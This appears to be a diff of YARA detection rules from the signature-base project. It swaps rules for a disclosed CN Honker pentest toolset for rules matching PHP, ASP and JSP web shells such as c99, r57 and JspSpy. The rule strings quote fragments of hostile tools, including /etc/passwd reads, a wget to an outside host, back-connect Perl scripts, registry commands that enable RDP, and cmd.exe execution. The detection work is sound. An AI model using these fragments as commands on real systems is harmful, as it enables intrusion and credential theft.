+rule SIGNATURE_BASE_Webshell_Shell_Ci_Biz_Was_Here_C100_V_Xxx
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file 3389.bat"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff61a5cb-6089-5632-a65d-09f4ffd99857"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L167-L183"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2783-L2803"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cfedec7bd327897694f83501d76063fe16b13450"
-		logic_hash = "df07958e44c7896bc7bdf2b79bc95969593eb21b9c9ed51213fd15affb731ec2"
+		logic_hash = "a7841dec442877648a589045849f7f1b80316a30dda5a44ccc4bb626dbd2cdea"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "f2fa878de03732fbf5c86d656467ff50"
+		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
 
 	strings:
-		$s1 = "echo \"fDenyTSConnections\"=dword:00000000>>3389.reg " fullword ascii
-		$s2 = "echo \"PortNumber\"=dword:00000d3d>>3389.reg " fullword ascii
-		$s3 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server]>>" ascii
+		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
+		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
+		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
+		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
+		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
 
 	condition:
-		filesize < 2KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Alien_D : FILE
+rule SIGNATURE_BASE_Webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_Xxx1
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file D.ASP"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "88529577-0dea-5aa8-b763-79a69397ddd5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L185-L203"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2804-L2823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "de9cd4bd72b1384b182d58621f51815a77a5f07d"
-		logic_hash = "2eca697dd1f2ad80c5cd71507cd5f8abd2364b11dfe3206a1043e3d4f5835797"
+		logic_hash = "95d25e9dc75a9af91e23b8c53acb384616f5d8a78605200bdb94f016a7f160f6"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "f3ca29b7999643507081caab926e2e74"
+		hash2 = "527cf81f9272919bf872007e21c4bdda"
 
 	strings:
-		$s0 = "Paths_str=\"c:\\windows\\\"&chr(13)&chr(10)&\"c:\\Documents and Settings\\\"&chr" ascii
-		$s1 = "CONST_FSO=\"Script\"&\"ing.Fil\"&\"eSyst\"&\"emObject\"" fullword ascii
-		$s2 = "Response.Write \"<form id='form1' name='form1' method='post' action=''>\"" fullword ascii
-		$s3 = "set getAtt=FSO.GetFile(filepath)" fullword ascii
-		$s4 = "Response.Write \"<input name='NoCheckTemp' type='checkbox' id='NoCheckTemp' chec" ascii
+		$s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
+		$s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
+		$s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
+		$s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
 
 	condition:
-		filesize < 30KB and 2 of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Chinachopper_Db : FILE
+rule SIGNATURE_BASE_Webshell_C99_C99Shell_C99_W4Cking_Shell_Xxx
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file db.mdb"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1314e204-d3f5-5f0a-bb74-dc774fef3d3c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L205-L221"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2824-L2852"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "af79ff2689a6b7a90a5d3c0ebe709e42f2a15597"
-		logic_hash = "b650498df99c4620e3904ce8980cd58eb0cb5e0a7a275d54bdbcc41a687bec8e"
+		logic_hash = "731bbf06208d20874c1d8464472e6a66a2e9b0bc2dc0475783763b99eb70fefa"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "9c34adbc8fd8d908cbb341734830f971"
+		hash3 = "f2fa878de03732fbf5c86d656467ff50"
+		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash9 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s1 = "http://www.maicaidao.com/server.phpcaidao" fullword wide
-		$s2 = "<O>act=login</O>" fullword wide
-		$s3 = "<H>localhost</H>" fullword wide
+		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"
+		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
+		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
+		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
+		$s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
+		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
 
 	condition:
-		filesize < 340KB and 2 of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Syconfig : FILE
+rule SIGNATURE_BASE_Webshell_2008_2009Mssql_Phpspy_2005_Full_Phpspy_2006_Arabicspy_Hkrkoz
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file syconfig.dll"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3850007d-20d5-5b10-a549-dc4655877c6e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L223-L237"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2853-L2875"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ff75353df77d610d3bccfbffb2c9dfa258b2fac9"
-		logic_hash = "6b7f918b83bac84df5ac6b247d4162dd385aba0a32570366c62fc4830199e86e"
+		logic_hash = "2d78db4d45a35d6a78d4288e00a382a0937e3806f0570bd353b88955664a47f6"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s9 = "Hashq.CrackHost+FormUnit" fullword ascii
+		$s0 = "$this -> addFile($content, $filename);" fullword
+		$s3 = "function addFile($data, $name, $time = 0) {" fullword
+		$s8 = "function unix2DosTime($unixtime = 0) {" fullword
+		$s9 = "foreach($filelist as $filename){" fullword
 
 	condition:
-		uint16( 0 ) == 0x0100 and filesize < 18KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Linux_Bin : FILE
+rule SIGNATURE_BASE_Webshell_C99_C66_C99_Shadows_Mod_C99Shell
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file linux_bin"
+		description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3c56a4a8-6392-517c-a16e-63785799acb9"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L239-L254"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2876-L2898"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "26e71e6ebc6a3bdda9467ce929610c94de8a7ca0"
-		logic_hash = "d02fcf23e46a0b6d44c382e34d73ef6239b6a1afc690e417aa0e6b0898e277c0"
+		logic_hash = "b50a6124f25bbb6fcc9d16d1de26d833a4b968db8e8033e76f3a74695577017e"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s1 = "client.sin_port = htons(atoi(argv[3]));" fullword ascii
-		$s2 = "printf(\"\\n\\n*********Waiting Client connect*****\\n\\n\");" fullword ascii
+		$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
+		$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
+		$s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
+		$s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
+		$s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
+		$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
 
 	condition:
-		filesize < 20KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Intersect2_Beta : FILE
+rule SIGNATURE_BASE_Webshell_He1P_Jspspy_Nogfw_Ok_Style_1_Jspspy1
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file Intersect2-Beta.py"
+		description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d20da18d-f8c9-5eb3-8d5d-c8816cff3200"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L256-L272"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2899-L2922"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3ba5f720c4994cd4ad519b457e232365e66f37cc"
-		logic_hash = "bc6a83f8f851f7fb5b620be889619fcbd9f34ba27d495c2040e207caf95854bb"
+		logic_hash = "522ba5f797e33c27fef3ae8d89889c31799073ed3c770a49401f4d42ead04640"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash1 = "d71716df5042880ef84427acee8b121e"
+		hash2 = "344f9073576a066142b2023629539ebd"
+		hash3 = "32dea47d9c13f9000c4c807561341bee"
+		hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash5 = "3ea688e3439a1f56b16694667938316d"
+		hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
 
 	strings:
-		$s1 = "os.system(\"ls -alhR /home > AllUsers.txt\")" fullword ascii
-		$s2 = "os.system('getent passwd > passwd.txt')" fullword ascii
-		$s3 = "os.system(\"rm -rf credentials/\")" fullword ascii
+		$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
+		$s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?"
+		$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
+		$s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 50KB and 2 of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_IIS_Logcleaner1_0_Readme : FILE
+rule SIGNATURE_BASE_Webshell_000_403_C5_Config_Myxx_Querydong_Spyjsp2010_Zend
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file readme.txt"
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6f3605ab-cf9d-5f6b-8d89-6269976c5b0b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L274-L289"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2923-L2946"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2ab47d876b49e9a693f602f3545381415e82a556"
-		logic_hash = "3cbd7b2e1710c78bc8ab8d2730cc6da8eb95038f8431d5d0081db984b3d706cf"
+		logic_hash = "7ca710973592718c5455508c5798b3c51dce994d5ebd33aa3a59d1b03c096bdf"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash4 = "e0354099bee243702eb11df8d0e046df"
+		hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash6 = "655722eaa6c646437c8ae93daac46ae0"
+		hash7 = "591ca89a25f06cf01e4345f98a22845c"
 
 	strings:
-		$s2 = "LogCleaner.exe <ip> [Logpath]" fullword ascii
-		$s3 = "http://l-y.vicp.net" fullword ascii
+		$s0 = "return new Double(format.format(value)).doubleValue();" fullword
+		$s5 = "File tempF = new File(savePath);" fullword
+		$s9 = "if (tempF.isDirectory()) {" fullword
 
 	condition:
-		filesize < 7KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Alien_Command : FILE
+rule SIGNATURE_BASE_Webshell_C99_C99Shell_C99_C99Shell
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file command.txt"
+		description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55dd10c9-f7dc-5ee2-a47d-dab8cc7b60e6"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L291-L306"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2947-L2965"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5896b74158ef153d426fba76c2324cd9c261c709"
-		logic_hash = "a55be30fdb6598669d144308af5a9b6a21ab6140c75fdfc18cecf5d9add4a530"
+		logic_hash = "b999b1a8307e228fb97772799369e292fb806d614159f2b2abfc7a71c5bdb225"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s0 = "for /d %i in (E:\\freehost\\*) do @echo %i" fullword ascii
-		$s1 = "/c \"C:\\windows\\temp\\cscript\" C:\\windows\\temp\\iis.vbs" fullword ascii
+		$s2 = "$bindport_pass = \"c99\";" fullword
+		$s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
 
 	condition:
-		filesize < 8KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Portrecall_Bc : FILE
+rule SIGNATURE_BASE_Webshell_R57Shell127_R57_Ifx_R57_Kartal_R57_Antichat
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file bc.pl"
+		description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea74f260-87e6-5027-b558-628949cae32a"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L308-L324"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2966-L2987"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2084990406398afd856b2309c7f579d7d61c3767"
-		logic_hash = "f51644f195e42b91dae80ba1770aeb40790ea8528b6d09f5fed0f71d93bda5fc"
+		logic_hash = "23887963068f7dd2e4c85b11079276a00786d1a753f22e3b63f01139087a7f4c"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash4 = "3f71175985848ee46cc13282fbed2269"
 
 	strings:
-		$s0 = "print \"[*] Connected to remote host \\n\"; " fullword ascii
-		$s1 = "print \"Usage: $0 [Host] [Port] \\n\\n\";  " fullword ascii
-		$s5 = "print \"[*] Resolving HostName\\n\"; " fullword ascii
+		$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
+		$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
+		$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
+		$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
 
 	condition:
-		filesize < 10KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Tuoku_Script_MSSQL_ : FILE
+rule SIGNATURE_BASE_Webshell_NIX_REMOTE_WEB_SHELL_Nstview_Xxx
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file MSSQL_.asp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "35c4f119-6a57-580a-b5ee-c36af0ccc94a"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L326-L342"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2988-L3007"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7097c21f92306983add3b5b29a517204cd6cd819"
-		logic_hash = "4d721fd9711799cf3fd8ba6c300e270ed25faa2fb938ea01464e9bc9a3768e22"
+		logic_hash = "b10e89c6b1851f88a2bbb9116969ea3770366c162b911cb8a2c3a033da3a46bc"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "4745d510fed4378e4b1730f56f25e569"
+		hash2 = "f3ca29b7999643507081caab926e2e74"
+		hash3 = "46a18979750fa458a04343cf58faa9bd"
 
 	strings:
-		$s1 = "GetLoginCookie = Request.Cookies(Cookie_Login)" fullword ascii
-		$s2 = "if ShellPath=\"\" Then ShellPath = \"c:\\\\windows\\\\system32\\\\cmd.exe\"" fullword ascii
-		$s8 = "Set DD=CM.exec(ShellPath&\" /c \"&DefCmd)" fullword ascii
+		$s3 = "BODY, TD, TR {" fullword
+		$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
+		$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
 
 	condition:
-		filesize < 100KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Nc_MOVE : FILE
+rule SIGNATURE_BASE_Webshell_000_403_807_A_C5_Config_Css_Dm_He1P_Xxx
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file MOVE.txt"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "115d1ec9-6c4f-587e-977c-cd24ada89ab6"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L344-L360"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3008-L3058"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4195370c103ca467cddc8f2724a8e477635be424"
-		logic_hash = "49f41162919bb04744041ae6f7438e61d98fb7d5984a17535d9c4ce4d398671b"
+		logic_hash = "46eede3a1af29e344ed5107fc0af4bd13cd1492bff340d61063911bbb474e7b3"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "6acc82544be056580c3a1caaa4999956"
+		hash23 = "6aa32a6392840e161a018f3907a86968"
+		hash24 = "591ca89a25f06cf01e4345f98a22845c"
+		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash26 = "3ea688e3439a1f56b16694667938316d"
+		hash27 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash28 = "71097537a91fac6b01f46f66ee2d7749"
+		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s0 = "Destination: http://202.113.20.235/gj/images/2.asp" fullword ascii
-		$s1 = "HOST: 202.113.20.235" fullword ascii
-		$s2 = "MOVE /gj/images/A.txt HTTP/1.1" fullword ascii
+		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
+		$s4 = "URL downUrl = new URL(downFileUrl);" fullword
+		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
+		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
+		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
+		$s8 = "URLConnection conn = downUrl.openConnection();" fullword
